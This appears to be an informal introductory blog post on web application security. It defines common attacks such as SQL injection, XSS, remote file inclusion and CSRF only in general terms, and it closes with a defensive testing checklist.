Hi!! All of you!!
Another new security topic. Web application security what is this?
Here I will explore one of the major area of the security industry. Before move on to the content I would like to ask you something just imagine what would you do if there is no websites this world?
For this question most of you think that how is it possible? Because without it there is no use for internet. All of know this one. Then the next question for you is have you ever think about the security issues over those sites?
Most of us now think that if the page itself shows the security certificate along with the URL. Using that will not enough.
Here I will say that is not enough, most of us think that way but there are more problems around this sites here many of us think that even if it has problems then how it will affect me and why does we want to know about it.
The answer for this two questions are simple the awareness of this one will prevent you from hacked. So no more discussion let's dig the topic.
Web application security is the process of protecting websites and online services against different security threats that exploit vulnerabilities in an application’s code. Common targets for web application attacks are content management systems (e.g., WordPress), database administration tools (e.g., phpMyAdmin) and SaaS applications.
Web application vulnerabilities are typically the result of a lack of input/output sanitization, which are often exploited to either manipulate source code or gain unauthorized access.
Such vulnerabilities enable the use of different attack vectors, including:
SQL Injection – Occurs when a perpetrator uses malicious SQL code to manipulate a backend database so it reveals information. Consequences include the unauthorized viewing of lists, deletion of tables and unauthorized administrative access.
Cross-site Scripting (XSS) – XSS is an injection attack targeting users in order to access accounts, activate Trojans or modify page content. Stored XSS occurs when malicious code is injected directly into an application. Reflected XSStakes place when malicious script is reflected off of an application onto a user’s browser.
Remote File Inclusion – A hacker uses this type of attack to remotely inject a file onto a web application server. This can result in the execution of malicious scripts or code within the application, as well as data theft or manipulation.
Cross-site Request Forgery (CSRF) – An attack that could result in an unsolicited transfer of funds, changed passwords or data theft. It’s caused when a malicious web application makes a user’s browser perform an unwanted action in a site to which a user is logged on.
In theory, thorough input/output sanitization could eliminate all vulnerabilities, making an application immune to unlawful manipulation.
The following processes should be part of any web application security checklist:
Information gathering – Manually review the application, identifying entry points and client-side codes. Classify third-party hosted content.
Authorization – Test the application for path traversals; vertical and horizontal access control issues; missing authorization and insecure, direct object references.
Cryptography – Secure all data transmissions. Has specific data been encrypted? Have weak algorithms been used? Do randomness errors exist?
Denial of service – Improve an application’s resilience against denial of service threats by testing for anti-automation, account lockout, HTTP protocol DoS and SQL wildcard DoS. This doesn’t cover protection from high-volume DoS and DDoS attacks, which are best countered by a combination of filtering solutions and scalable resources.